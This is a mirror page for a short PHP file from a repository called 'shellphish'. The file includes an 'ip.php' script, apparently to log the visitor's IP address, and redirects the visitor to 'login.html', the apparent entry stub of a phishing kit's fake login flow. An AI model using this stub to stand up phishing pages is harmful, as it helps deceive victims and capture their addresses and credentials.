mirror of
https://github.com/richardsonjf/shellphish.git
synced 2025-12-13 10:20:37 -08:00
6 lines
64 B
PHP
6 lines
64 B
PHP
<?php
|
|
include 'ip.php';
|
|
header('Location: login.html');
|
|
exit
|
|
?>
|